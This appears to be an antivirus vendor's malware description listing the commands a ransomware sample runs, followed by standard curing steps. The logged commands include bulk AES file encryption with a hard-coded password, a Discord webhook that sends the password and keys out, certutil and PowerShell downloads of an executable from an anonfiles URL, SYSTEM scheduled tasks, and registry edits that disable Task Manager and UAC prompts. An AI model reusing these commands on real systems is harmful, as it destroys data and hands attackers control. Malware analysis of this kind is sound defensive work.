  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "FXSAPIDebugLogFile.txt.lck" "FXSAPIDebugLogFile.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "opera_crashreporter.log.lck" "opera_crashreporter.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt73.txt.lck" "Pay2Decrypt73.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "~DF126C65421E97E1B5.TMP.lck" "~DF126C65421E97E1B5.TMP"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRDE7F.tmp.cvr.lck" "CVRDE7F.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRC867.tmp.cvr.lck" "CVRC867.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRBADA.tmp.cvr.lck" "CVRBADA.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CProgram.lck" "CProgram"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVR6B9C.tmp.cvr.lck" "CVR6B9C.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVR6D44.tmp.cvr.lck" "CVR6D44.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "jawshtml.html.lck" "jawshtml.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "kill.bat.lck" "kill.bat"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVREAF2.tmp.cvr.lck" "CVREAF2.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "jusched.log.lck" "jusched.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt72.txt.lck" "Pay2Decrypt72.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt63.txt.lck" "Pay2Decrypt63.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt11.txt.lck" "Pay2Decrypt11.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt12.txt.lck" "Pay2Decrypt12.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt13.txt.lck" "Pay2Decrypt13.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt14.txt.lck" "Pay2Decrypt14.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt15.txt.lck" "Pay2Decrypt15.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt16.txt.lck" "Pay2Decrypt16.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt17.txt.lck" "Pay2Decrypt17.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt18.txt.lck" "Pay2Decrypt18.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt71.txt.lck" "Pay2Decrypt71.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt19.txt.lck" "Pay2Decrypt19.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt20.txt.lck" "Pay2Decrypt20.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt21.txt.lck" "Pay2Decrypt21.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt22.txt.lck" "Pay2Decrypt22.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt23.txt.lck" "Pay2Decrypt23.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt24.txt.lck" "Pay2Decrypt24.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt25.txt.lck" "Pay2Decrypt25.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt26.txt.lck" "Pay2Decrypt26.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt27.txt.lck" "Pay2Decrypt27.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt10.txt.lck" "Pay2Decrypt10.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt100.txt.lck" "Pay2Decrypt100.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt28.txt.lck" "Pay2Decrypt28.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt1.txt.lck" "Pay2Decrypt1.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt86.txt.lck" "Pay2Decrypt86.txt"
  • '%TEMP%\e35c.tmp\discordsendwebhook.exe' -m ":satellite: LEAKGAP: Info from user, Password: 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH, FakeAccount: LFVzAz7wZoIB607lrOse58PtIv4FK0bba, PersonalKey:||glFYFErVRmreS740iLR44vNkWFJv3xaOPtPNhx8SxAN5N|...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-process -verb runas -FilePath "%TEMP%\final.exe" -WindowStyle hidden
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "desktop.ini.lck" "desktop.ini"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt98.txt.lck" "Pay2Decrypt98.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt97.txt.lck" "Pay2Decrypt97.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt96.txt.lck" "Pay2Decrypt96.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt95.txt.lck" "Pay2Decrypt95.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt99.txt.lck" "Pay2Decrypt99.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt51.txt.lck" "Pay2Decrypt51.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt2.txt.lck" "Pay2Decrypt2.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt94.txt.lck" "Pay2Decrypt94.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt92.txt.lck" "Pay2Decrypt92.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt91.txt.lck" "Pay2Decrypt91.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt90.txt.lck" "Pay2Decrypt90.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt9.txt.lck" "Pay2Decrypt9.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt89.txt.lck" "Pay2Decrypt89.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt88.txt.lck" "Pay2Decrypt88.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt87.txt.lck" "Pay2Decrypt87.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt85.txt.lck" "Pay2Decrypt85.txt"
  • '%TEMP%\e35c.tmp\e35d.tmp\extd.exe' "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "%TEMP%\final.exe" "" "" "" "" "" ""
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt93.txt.lck" "Pay2Decrypt93.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "final.exe.lck" "final.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt70.txt.lck" "Pay2Decrypt70.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt53.txt.lck" "Pay2Decrypt53.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt55.txt.lck" "Pay2Decrypt55.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt56.txt.lck" "Pay2Decrypt56.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt57.txt.lck" "Pay2Decrypt57.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt58.txt.lck" "Pay2Decrypt58.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt59.txt.lck" "Pay2Decrypt59.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt6.txt.lck" "Pay2Decrypt6.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt60.txt.lck" "Pay2Decrypt60.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt61.txt.lck" "Pay2Decrypt61.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt30.txt.lck" "Pay2Decrypt30.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt62.txt.lck" "Pay2Decrypt62.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt64.txt.lck" "Pay2Decrypt64.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt65.txt.lck" "Pay2Decrypt65.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt66.txt.lck" "Pay2Decrypt66.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt67.txt.lck" "Pay2Decrypt67.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt68.txt.lck" "Pay2Decrypt68.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt69.txt.lck" "Pay2Decrypt69.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt7.txt.lck" "Pay2Decrypt7.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt52.txt.lck" "Pay2Decrypt52.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt3.txt.lck" "Pay2Decrypt3.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt84.txt.lck" "Pay2Decrypt84.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt5.txt.lck" "Pay2Decrypt5.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt31.txt.lck" "Pay2Decrypt31.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt33.txt.lck" "Pay2Decrypt33.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt34.txt.lck" "Pay2Decrypt34.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt35.txt.lck" "Pay2Decrypt35.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt36.txt.lck" "Pay2Decrypt36.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt37.txt.lck" "Pay2Decrypt37.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt38.txt.lck" "Pay2Decrypt38.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt39.txt.lck" "Pay2Decrypt39.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt50.txt.lck" "Pay2Decrypt50.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt4.txt.lck" "Pay2Decrypt4.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt29.txt.lck" "Pay2Decrypt29.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt41.txt.lck" "Pay2Decrypt41.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt43.txt.lck" "Pay2Decrypt43.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt44.txt.lck" "Pay2Decrypt44.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt45.txt.lck" "Pay2Decrypt45.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt46.txt.lck" "Pay2Decrypt46.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt47.txt.lck" "Pay2Decrypt47.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt48.txt.lck" "Pay2Decrypt48.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt49.txt.lck" "Pay2Decrypt49.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt40.txt.lck" "Pay2Decrypt40.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt32.txt.lck" "Pay2Decrypt32.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt42.txt.lck" "Pay2Decrypt42.txt"
  • '<SYSTEM32>\cmd.exe' /k call %TEMP%\p2d.bat' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\E35C.tmp\E35D.tmp\E35E.bat <Full path to file>"
  • '<SYSTEM32>\cmd.exe' /c dir * /aD /b /oS
  • '<SYSTEM32>\cmd.exe' /c dir * /a-D /b /oS
  • '<SYSTEM32>\attrib.exe' +r +s +h %LOCALAPPDATA%\Temp /s /D
  • '<SYSTEM32>\schtasks.exe' /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "%TEMP%\final.exe" /RU "SYSTEM" /MO 5
  • '<SYSTEM32>\certutil.exe' -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe %TEMP%\final.exe
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile %TEMP%\final.exe
  • '<SYSTEM32>\notepad.exe' %HOMEPATH%\Desktop\Pay2Decrypt1.txt
  • '<SYSTEM32>\cmd.exe' /k call %TEMP%\p2d.bat
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-process -FilePath "<SYSTEM32>\cmd.exe" -ArgumentList "/k","call","%TEMP%\p2d.bat" -WorkingDirectory "%HOMEPATH%\Desktop" -WindowStyle hidden
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c Invoke-WebRequest -Uri -OutFile
  • '<SYSTEM32>\schtasks.exe' /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "<Full path to file>" /RU "SYSTEM" /f
  • '<SYSTEM32>\attrib.exe' +r +s +h "%TEMP%\E35C.tmp\DiscordSendWebhook.exe"
  • '<SYSTEM32>\attrib.exe' +r +s +h "%TEMP%\E35C.tmp\aescrypt.exe"
  • '<SYSTEM32>\attrib.exe' +r +s +h <Full path to file>
  • '<SYSTEM32>\reg.exe' ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f00000001000...
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "%LOCALAPPDATA%\Temp" -WindowStyle hidden
  • '<SYSTEM32>\certutil.exe' -urlcache -split -f

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android